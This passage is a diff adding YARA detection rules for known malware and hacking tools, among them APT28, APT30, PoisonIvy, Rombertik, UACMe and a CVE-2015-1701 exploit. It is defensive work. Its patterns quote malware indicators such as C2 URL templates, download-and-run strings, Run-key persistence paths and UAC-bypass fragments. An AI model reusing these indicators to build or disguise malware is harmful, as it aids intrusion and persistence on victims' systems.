+      $s4 = "CreateProcessAsUserA" fullword ascii
+      $s5 = "HttpSendRequestExA" fullword ascii
+      $s6 = "HttpEndRequestA" fullword ascii
+      $s7 = "GetModuleBaseNameA" fullword ascii
+      $s8 = "GetModuleFileNameExA" fullword ascii
+      $s9 = "HttpSendRequestA" fullword ascii
+      $s10 = "HttpOpenRequestA" fullword ascii
+      $s11 = "InternetConnectA" fullword ascii
+      $s12 = "Process32Next" fullword ascii
+      $s13 = "Process32First" fullword ascii
+      $s14 = "CreatePipe" fullword ascii
+      $s15 = "EnumProcesses" fullword ascii
+      $s16 = "LookupPrivilegeValueA" fullword ascii
+      $s17 = "PeekNamedPipe" fullword ascii
+      $s18 = "EnumProcessModules" fullword ascii
+      $s19 = "PSAPI.DLL" fullword ascii
+      $s20 = "SPSSSQ" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 220KB and all of them
+}
+
+rule APT_Malware_PutterPanda_Gen4_RID3192 : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects Malware related to PutterPanda"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 13:28:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
+      hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
+      hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "rz.dat" fullword ascii
+      $s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
+      $s1 = "Internet connect error:%d" fullword ascii
+      $s2 = "Proxy-Authorization:Basic " fullword ascii
+      $s5 = "Invalid url" fullword ascii
+      $s6 = "Create file failed" fullword ascii
+      $s7 = "myAgent" fullword ascii
+      $z1 = "%s%s%d%d" fullword ascii
+      $z2 = "HttpQueryInfo failed:%d" fullword ascii
+      $z3 = "read file error:%d" fullword ascii
+      $z4 = "down file success" fullword ascii
+      $z5 = "kPStoreCreateInstance" fullword ascii
+      $z6 = "Avaliable data:%u bytes" fullword ascii
+      $z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
+   condition: 
+      filesize < 300KB and ( ( uint16 ( 0 ) == 0x5a4d and $x1 and 3 of ( $s* ) ) or ( 3 of ( $s* ) and 4 of ( $z* ) ) )
+}
+
+rule APT_Malware_CommentCrew_MiniASP_RID32B1 : APT DEMO EXE FILE G0006 MAL {
+   meta:
+      description = "CommentCrew Malware MiniASP APT"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 14:16:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "777bf8def279942a25750feffc11d8a36cc0acf9"
+      hash2 = "173f20b126cb57fc8ab04d01ae223071e2345f97"
+      tags = "APT, DEMO, EXE, FILE, G0006, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii
+      $x2 = "run http://%s/logo.png setup.exe" fullword ascii
+      $x3 = "d:\\command.txt" fullword ascii
+      $z1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR " ascii
+      $z2 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)" fullword ascii
+      $z3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC" ascii
+      $s1 = "http://%s/device_command.asp?device_id=%s&cv=%s&command=%s" fullword ascii
+      $s2 = "kill process error!" fullword ascii
+      $s3 = "kill process success!" fullword ascii
+      $s4 = "pickup command error!" fullword ascii
+      $s5 = "http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s" fullword ascii
+      $s6 = "no command" fullword ascii
+      $s7 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
+      $s8 = "command is null!" fullword ascii
+      $s9 = "pickup command Ok!" fullword ascii
+      $s10 = "http://%s/result_%s.htm" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) or ( all of ( $z* ) ) or ( 8 of ( $s* ) )
+}
+
+rule APT28_CHOPSTICK_RID2B67 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Detects a malware that behaves like CHOPSTICK mentioned in APT28 report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/v3ebal"
+      date = "2015-06-02 09:05:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "jhuhugit.tmp" fullword ascii
+      $s8 = "KERNEL32.dll" fullword ascii
+      $s9 = "IsDebuggerPresent" fullword ascii
+      $s10 = "IsProcessorFeaturePresent" fullword ascii
+      $s11 = "TerminateProcess" fullword ascii
+      $s13 = "DeleteFileA" fullword ascii
+      $s15 = "GetProcessHeap" fullword ascii
+      $s16 = "!This program cannot be run in DOS mode." fullword ascii
+      $s17 = "LoadLibraryA" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 722KB and all of them
+}
+
+rule APT28_SourFace_Malware2_RID2F31 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+      date = "2015-06-01 11:46:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
+      hash2 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
+      hash3 = "682e49efa6d2549147a21993d64291bfa40d815a"
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "coreshell.dll" fullword ascii
+      $s1 = "Applicate" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 550KB and all of them
+}
+
+rule APT28_SourFace_Malware3_RID2F32 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+      date = "2015-06-01 11:46:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
+      hash2 = "367d40465fd1633c435b966fa9b289188aa444bc"
+      hash3 = "d87b310aa81ae6254fff27b7d57f76035f544073"
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "coreshell.dll" fullword wide
+      $s1 = "Core Shell Runtime Service" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 550KB and all of them
+}
+
+rule SVG_LoadURL_RID2AD3 : DEMO EXPLOIT MAL {
+   meta:
+      description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
+      author = "Florian Roth"
+      reference = "http://goo.gl/psjCCc"
+      date = "2015-05-24 08:43:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "</svg>" nocase
+      $s2 = "<script>" nocase
+      $s3 = "location.href='http" nocase
+   condition: 
+      all of ( $s* ) and filesize < 600
+}
+
+rule DarkEYEv3_Cryptor_RID2D71 : DEMO EXE FILE MAL SUSP {
+   meta:
+      description = "Rule to detect DarkEYEv3 encrypted executables (often malware)"
+      author = "Florian Roth"
+      reference = "http://darkeyev3.blogspot.fi/"
+      date = "2015-05-24 10:32:01"
+      score = 55
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d53149968eca654fc0e803f925e7526fdac2786c"
+      hash2 = "7e3a8940d446c57504d6a7edb6445681cca31c65"
+      hash3 = "d3dd665dd77b02d7024ac16eb0949f4f598299e7"
+      tags = "DEMO, EXE, FILE, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\DarkEYEV3-" 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and $s0
+}
+
+rule MAL_PoisonIvy_Generic_3_RID2FA8 : DEMO EXE FILE GEN MAL {
+   meta:
+      description = "PoisonIvy RAT Generic Rule"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2015-05-14 12:06:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $k1 = "Tiger324{" fullword ascii
+      $s2 = "WININET.dll" fullword ascii
+      $s3 = "mscoree.dll" fullword wide
+      $s4 = "WS2_32.dll" fullword
+      $s5 = "Explorer.exe" fullword wide
+      $s6 = "USER32.DLL" 
+      $s7 = "CONOUT$" 
+      $s8 = "login.asp" 
+      $h1 = "HTTP/1.0" 
+      $h2 = "POST" 
+      $h3 = "login.asp" 
+      $h4 = "check.asp" 
+      $h5 = "result.asp" 
+      $h6 = "upload.asp" 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( $k1 or all of ( $s* ) or all of ( $h* ) )
+}
+
+rule APT17_Sample_FXSST_DLL_RID2E51 : APT DEMO EXE FILE G0025 {
+   meta:
+      description = "Detects Samples related to APT17 activity - file FXSST.DLL"
+      author = "Florian Roth"
+      reference = "https://goo.gl/ZiJyQv"
+      date = "2015-05-14 11:09:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0025"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Microsoft? Windows? Operating System" fullword wide
+      $x2 = "fxsst.dll" fullword ascii
+      $y1 = "DllRegisterServer" fullword ascii
+      $y2 = ".cSV" fullword ascii
+      $s1 = "GetLastActivePopup" 
+      $s2 = "Sleep" 
+      $s3 = "GetModuleFileName" 
+      $s4 = "VirtualProtect" 
+      $s5 = "HeapAlloc" 
+      $s6 = "GetProcessHeap" 
+      $s7 = "GetCommandLine" 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and ( all of ( $x* ) or all of ( $y* ) ) and all of ( $s* )
+}
+
+rule custom_ssh_backdoor_server_RID31F3 : DEMO HKTL MAL SCRIPT T1021 T1059_006 {
+   meta:
+      description = "Custome SSH backdoor based on python and paramiko - file server.py"
+      author = "Florian Roth"
+      reference = "https://goo.gl/S46L3o"
+      date = "2015-05-14 13:44:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-08-18"
+      tags = "DEMO, HKTL, MAL, SCRIPT, T1021, T1059_006"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
+      $s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
+      $s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
+   condition: 
+      2 of them
+}
+
+rule UACME_Akagi_RID2AB8 : DEMO HKTL MAL {
+   meta:
+      description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
+      author = "Florian Roth"
+      reference = "https://github.com/hfiref0x/UACME"
+      date = "2015-05-14 07:58:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
+      hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
+      tags = "DEMO, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "UACMe injected, Fubuki at your service." wide fullword
+      $x3 = "%temp%\\Hibiki.dll" fullword wide
+      $x4 = "[UCM] Cannot write to the target process memory." fullword wide
+      $s1 = "%systemroot%\\system32\\cmd.exe" wide
+      $s2 = "D:(A;;GA;;;WD)" wide
+      $s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
+      $s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
+      $s5 = "Fubuki.dll" ascii fullword
+      $l1 = "ntdll.dll" ascii
+      $l2 = "Cabinet.dll" ascii
+      $l3 = "GetProcessHeap" ascii
+      $l4 = "WriteProcessMemory" ascii
+      $l5 = "ShellExecuteEx" ascii
+   condition: 
+      ( 1 of ( $x* ) ) or ( 3 of ( $s* ) and all of ( $l* ) )
+}
+
+rule UACElevator_RID2B2C : DEMO EXE FILE HKTL T1088 T1548_002 {
+   meta:
+      description = "UACElevator_RID2B2C bypassing UAC - file UACElevator_RID2B2C.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/MalwareTech/UACElevator_RID2B2C"
+      date = "2015-05-14 08:55:11"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, HKTL, T1088, T1548_002"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\UACElevator_RID2B2C.pdb" ascii
+      $s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
+      $s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
+      $s3 = "Infection module: %s" fullword ascii
+      $s4 = "Could not save module to %s" fullword ascii
+      $s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
+      $s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
+      $s7 = "Stack around the variable '" fullword ascii
+      $s8 = "MSVCR120D.dll" fullword wide
+      $s9 = "Address: 0x" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ( $s* ) )
+}
+
+rule CVE_2015_1701_Taihou_RID2D07 : CVE_2015_1701 DEMO EXE EXPLOIT FILE T1068 {
+   meta:
+      description = "CVE-2015-1701 compiled exploit code"
+      author = "Florian Roth"
+      reference = "http://goo.gl/W4nU0q"
+      date = "2015-05-13 10:14:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
+      hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
+      hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
+      tags = "CVE_2015_1701, DEMO, EXE, EXPLOIT, FILE, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "VirtualProtect" fullword
+      $s4 = "RegisterClass" 
+      $s5 = "LoadIcon" 
+      $s6 = "PsLookupProcessByProcessId" fullword ascii
+      $s7 = "LoadLibraryExA" fullword ascii
+      $s8 = "gSharedInfo" fullword
+      $w1 = "user32.dll" wide
+      $w2 = "ntdll" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 160KB and all of ( $s* ) and 1 of ( $w* )
+}
+
+rule MAL_Rombertik_CarbonGrabber_RID3162 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
+      author = "Florian Roth"
+      reference = "http://blogs.cisco.com/security/talos/rombertik"
+      date = "2015-05-05 13:20:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"
+      hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
+      hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ZwGetWriteWatch" fullword ascii
+      $x2 = "OutputDebugStringA" fullword ascii
+      $x3 = "malwar" fullword ascii
+      $x4 = "sampl" fullword ascii
+      $x5 = "viru" fullword ascii
+      $x6 = "sandb" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5MB and all of them
+}
+
+rule MAL_Rombertik_CarbonGrabber_Builder_Server_RID375E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
+      author = "Florian Roth"
+      reference = "http://blogs.cisco.com/security/talos/rombertik"
+      date = "2015-05-05 17:35:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
+      $s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii
+      $s4 = "chrome.exe" fullword ascii
+      $s5 = "firefox.exe" fullword ascii
+      $s6 = "chrome.dll" fullword ascii
+      $s7 = "@KERNEL32.DLL" fullword wide
+      $s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii
+      $s10 = "&post=" fullword ascii
+      $s11 = "&host=" fullword ascii
+      $s12 = "Ws2_32.dll" fullword ascii
+      $s16 = "&browser=" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and 8 of them
+}
+
+rule APT30_Sample_6_RID2BAF : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:17:01"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "GreateProcessA" fullword ascii
+      $s1 = "Ternel32.dll" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_17_RID2BE1 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Nkfvtyvn}]ty}ztU" fullword ascii
+      $s4 = "IEXPL0RE" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule Explosion_Sample_2_RID2E24 : APT DEMO FILE G0123 MAL MIDDLE_EAST {
+   meta:
+      description = "Explosion/Explosive Malware - Volatile Cedar APT"
+      author = "Florian Roth"
+      reference = "http://goo.gl/5vYaNb"
+      date = "2015-04-03 11:01:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0123, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "serverhelp.dll" fullword wide
+      $s1 = "Windows Help DLL" fullword wide
+      $s5 = "SetWinHoK" fullword ascii
+   condition: 
+      all of them and uint16 ( 0 ) == 0x5A4D
+}
+
+rule Explosion_Generic_1_RID2E7E : APT DEMO FILE G0123 GEN MAL MIDDLE_EAST T1091 {
+   meta:
+      description = "Generic Rule for Explosion/Explosive Malware - Volatile Cedar APT - Autorun"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2015-04-03 11:16:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908"
+      hash2 = "d8fdcdaad652c19f4f4676cd2f89ae834dbc19e2759a206044b18601875f2726"
+      hash3 = "e2e6ed82703de21eb4c5885730ba3db42f3ddda8b94beb2ee0c3af61bc435747"
+      tags = "APT, DEMO, FILE, G0123, GEN, MAL, MIDDLE_EAST, T1091"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "autorun.exe" fullword
+      $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CL" 
+      $s2 = "%drp.exe" fullword
+      $s3 = "%s_%s%d.exe" fullword
+      $s4 = "open=autorun.exe" fullword
+      $s5 = "http://www.microsoft.com/en-us/default.aspx" fullword
+      $s10 = "error.renamefile" fullword
+      $s12 = "insufficient lookahead" fullword
+      $s13 = "%s %s|" fullword
+      $s16 = ":\\autorun.exe" fullword
+   condition: 
+      7 of them and uint16 ( 0 ) == 0x5A4D
+}
+
+rule APT30_Sample_2_RID2BAB : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:16:21"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "ForZRLnkWordDlg.EXE" fullword wide
+      $s1 = "ForZRLnkWordDlg Microsoft " fullword wide
+      $s9 = "ForZRLnkWordDlg 1.0 " fullword wide
+      $s11 = "ForZRLnkWordDlg" fullword wide
+      $s12 = " (C) 2011" fullword wide
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_3_RID2BAC : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:16:31"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "Software\\Mic" ascii
+      $s6 = "HHOSTR" ascii
+      $s9 = "ThEugh" fullword ascii
+      $s10 = "Moziea/" ascii
+      $s12 = "%s%s(X-" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_C_RID2C17 : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:34:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8667f635fe089c5e2c666b3fe22eaf3ff8590a69"
+      hash2 = "0c4fcef3b583d0ffffc2b14b9297d3a4"
+      hash3 = "37aee58655f5859e60ece6b249107b87"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "MYUSER32.dll" fullword ascii
+      $s1 = "MYADVAPI32.dll" fullword ascii
+      $s2 = "MYWSOCK32.dll" fullword ascii
+      $s3 = "MYMSVCRT.dll" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_4_RID2BAD : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:16:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "GetStartupIn" ascii
+      $s1 = "enMutex" ascii
+      $s2 = "tpsvimi" ascii
+      $s3 = "reateProcesy" ascii
+      $s5 = "FreeLibr1y*S" ascii
+      $s6 = "foAModuleHand" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_5_RID2BAE : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:16:51"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Version 4.7.3001" fullword wide
+      $s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
+      $s3 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
+      $s7 = "msmsgs" fullword wide
+      $s10 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_7_RID2BB0 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:17:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "datain" fullword ascii
+      $s3 = "C:\\Prog" ascii
+      $s4 = "$LDDATA$" ascii
+      $s5 = "Maybe a Encrypted Flash" fullword ascii
+      $s6 = "Jean-loup Gailly" ascii
+      $s8 = "deflate 1.1.3 Copyright" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_E_RID2C19 : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:34:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1dbb584e19499e26398fb0a7aa2a01b7"
+      hash2 = "572c9cd4388699347c0b2edb7c6f5e25"
+      hash3 = "8ff473bedbcc77df2c49a91167b1abeb"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Nkfvtyvn}" ascii
+      $s6 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_8_RID2BB1 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:17:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "ateProcessA" ascii
+      $s1 = "Ternel32.dllFQ" fullword ascii
+      $s2 = "StartupInfoAModuleHand" fullword ascii
+      $s3 = "OpenMutex" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_B_RID2C16 : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:34:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0fcb4ffe2eb391421ec876286c9ddb6c"
+      hash2 = "29395c528693b69233c1c12bef8a64b3"
+      hash3 = "4c6b21e98ca03e0ef0910e07cef45dac"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Moziea/4.0" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_I_RID2C1D : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:35:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fe211c7a081c1dac46e3935f7c614549"
